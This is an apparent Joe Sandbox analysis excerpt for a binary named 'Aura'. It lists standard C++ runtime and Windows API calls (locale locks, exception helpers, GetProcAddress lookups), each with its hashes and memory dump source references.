                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fddde31f4202a5455540aa0440081df78edb257d276843948dbe79b78f15374
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E941C034A00218ABCF10DF68C885ADFBBB5AF44314F148965E9256B393D775EE11CB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000A3CA5
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000A3CBF
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000A3CE0
                                                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 000A3D92
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000A3DD8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                                    • String ID: e.
                                                                                                                                                                                                                                                    • API String ID: 3087743877-3303777608
                                                                                                                                                                                                                                                    • Opcode ID: 77dd28d0787f50d11da1b080dd7e1906068026ee82f0273d596d73e4a05b51be
                                                                                                                                                                                                                                                    • Instruction ID: 8a5887486b16715f5800fd36eae0f3b4ab960ceb4b124db4489e17f81cabce57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77dd28d0787f50d11da1b080dd7e1906068026ee82f0273d596d73e4a05b51be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64415A71E012158FDB14DF94D845BAEB7B1FF55720F14811AE815AB392DB38AE01CFA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000B0086
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000B0094
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000B00A5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                    • Opcode ID: f6d93339a8747aa75ab413928d35dfeb521794b31926c19c2e5398523ebcd991
                                                                                                                                                                                                                                                    • Instruction ID: 30c14ed0a74f03f4c9ca02203c46ab45f3e3ef4f7b9c05e6100d6261306c6d7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6d93339a8747aa75ab413928d35dfeb521794b31926c19c2e5398523ebcd991
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62D09E755673106BB3105F74BC0999A3BB9FB097113015163FD45D6351DB7A85008675
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a8dbf6586718f7ee27c4c04d2f3eaf94c256293f6759752b996086bf92794dab
                                                                                                                                                                                                                                                    • Instruction ID: 191a637f09b986c88c6d2a1961bdf1185aa3e3c610e0e9ccb3fd5d01dcc1160c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8dbf6586718f7ee27c4c04d2f3eaf94c256293f6759752b996086bf92794dab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6B1F178A04A499FDB11CFA8DC81FEEBBF0BF46311F14415DE9049B292C775A981CBA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9C97
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9CA8
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9CBC
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9CDD
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9CEE
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A9D06
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2134207285-0
                                                                                                                                                                                                                                                    • Opcode ID: 7f496bb3b37bb7aeea23fe749f6603dd3ef3368323919dadd5738ee7107feae7
                                                                                                                                                                                                                                                    • Instruction ID: e2be30453613de19f6f0e1d129d7e393893d93cb1ec8d4631529b8552d84534f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f496bb3b37bb7aeea23fe749f6603dd3ef3368323919dadd5738ee7107feae7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE41B1B1A00B45CBDB309BE489467EFB7F4AF47324F18062DD56A262D3D7716904CBA2
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000BACDE,000B0760,000AB77F,F7EDDA51,?,?,?,?,000CBFCA,000000FF), ref: 000BACF5
                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000BAD03
                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000BAD1C
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,000BACDE,000B0760,000AB77F,F7EDDA51,?,?,?,?,000CBFCA,000000FF), ref: 000BAD6E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                    • Opcode ID: 9bf5911b895fef929749a55dd7419cec3ce55a34d8e5745bc353ad95756e03ba
                                                                                                                                                                                                                                                    • Instruction ID: 022e422ad9c59d92eff771dac21e5234fefd1dee68f19250101a6fb893c365a9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bf5911b895fef929749a55dd7419cec3ce55a34d8e5745bc353ad95756e03ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9001F13231A615AEB7342778BC85EEA3BC4EB02B71720033FFA11415F1EF1648069151
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 000BB68D
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 000BB906
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                    • Opcode ID: 44286b8d18bd61fcbd3bc60fef3fdc5424ead83abdd24c7e892b8b0ffed606d4
                                                                                                                                                                                                                                                    • Instruction ID: b5af7eb2ab4df3231db034709e01d123cf190e6d52cbff01769be434e37afeda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44286b8d18bd61fcbd3bc60fef3fdc5424ead83abdd24c7e892b8b0ffed606d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DB16671900209EFCF24DFA5C8819EEBBB9FF14310F14456AE8116B212DBB5DA61CF92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 000ABF44
                                                                                                                                                                                                                                                    • std::_Ref_count_base::_Decref.LIBCPMT ref: 000AC028
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                    • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                    • Opcode ID: 3859590004ede0d79d26d730ea26c521cb6610b710b92fed3fd3fc1892293f60
                                                                                                                                                                                                                                                    • Instruction ID: 5bb2a6f73fcb4e8a73405aba0ceab59f56fa649bc43957b1cc9387c71836a236
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3859590004ede0d79d26d730ea26c521cb6610b710b92fed3fd3fc1892293f60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D41BA74900204DFCF28DFA8C9459EEB7F5AF4A300F58806DE449AB653CB38AE04CB52
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F7EDDA51,?,?,00000000,000CBE94,000000FF,?,000B5685,00000002,?,000B5721,000B8396), ref: 000B55F9
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000B560B
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,000CBE94,000000FF,?,000B5685,00000002,?,000B5721,000B8396), ref: 000B562D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    • Opcode ID: ef4003b812754d3fbd97990582050fe27a432330cbcdde01ee9304b2c4084d7d
                                                                                                                                                                                                                                                    • Instruction ID: 4bb3ce20d1918b00c5662f9c64628c3b48e9da1ece0ee1dae6daba3ff6b1bef6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef4003b812754d3fbd97990582050fe27a432330cbcdde01ee9304b2c4084d7d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE016231A51629AFDB119F54DC09BEEB7F8FB04B16F00052AFC11A7290DB7A9900CAA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000BD76F
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000BD838
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 000BD89F
                                                                                                                                                                                                                                                      • Part of subcall function 000BBF11: RtlAllocateHeap.NTDLL(00000000,000BDF35,?,?,000BDF35,00000220,?,00000000,?), ref: 000BBF43
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 000BD8B2
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 000BD8BF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1423051803-0
                                                                                                                                                                                                                                                    • Opcode ID: 03eafbf800552b9ab34e555c501cc7147467724b7d452f4f78dd146e77cc795a
                                                                                                                                                                                                                                                    • Instruction ID: a4fc5b2e8ef1f26a667b3370ebc0b3095f324b884359ff6c124caa44b53371b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03eafbf800552b9ab34e555c501cc7147467724b7d452f4f78dd146e77cc795a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04519172600206AFEB219FA1CC85EFBBAE9EF45711B15012BFD04D6252FF71DC1096A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000AF005
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(000A8E38), ref: 000AF024
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(000A8E38,000AA2F0,?), ref: 000AF052
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(000A8E38,000AA2F0,?), ref: 000AF0AD
                                                                                                                                                                                                                                                    • TryAcquireSRWLockExclusive.KERNEL32(000A8E38,000AA2F0,?), ref: 000AF0C4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 66001078-0
                                                                                                                                                                                                                                                    • Opcode ID: af26108f8c5b3d18a8763f6c4c26c4d37ec5e4d5e9590b942aacebc13679832f
                                                                                                                                                                                                                                                    • Instruction ID: 000f2ddbae669f30184dab5f8810313d430afc9d5b0eae69dab7afea35ab2c1f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af26108f8c5b3d18a8763f6c4c26c4d37ec5e4d5e9590b942aacebc13679832f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D411671A0060BDBCB20DFE5C885DBAB3F5FF06311B204A3AE45697642DB35E985CB61
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 000AD4C9
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000AD4D3
                                                                                                                                                                                                                                                    • int.LIBCPMT ref: 000AD4EA
                                                                                                                                                                                                                                                      • Part of subcall function 000AC1E5: std::_Lockit::_Lockit.LIBCPMT ref: 000AC1F6
                                                                                                                                                                                                                                                      • Part of subcall function 000AC1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 000AC210
                                                                                                                                                                                                                                                    • codecvt.LIBCPMT ref: 000AD50D
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000AD544
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3716348337-0
                                                                                                                                                                                                                                                    • Opcode ID: 691e97bf17c896d67bfcc7c08340ca64211d3d50b519151ba92ea161ab7d4f19
                                                                                                                                                                                                                                                    • Instruction ID: 54c3ad681c965fee2f82dd1567682e110888dc45d20ac2340bd387a6ef7b7ef6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 691e97bf17c896d67bfcc7c08340ca64211d3d50b519151ba92ea161ab7d4f19
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78018B71D005168FDB01EBE4C901EFEB7B5AF86324F15000AE816AB2D3CF389A00CB92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 000AADDE
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 000AADE9
                                                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 000AAE57
                                                                                                                                                                                                                                                      • Part of subcall function 000AACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000AACC2
                                                                                                                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 000AAE04
                                                                                                                                                                                                                                                    • _Yarn.LIBCPMT ref: 000AAE1A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
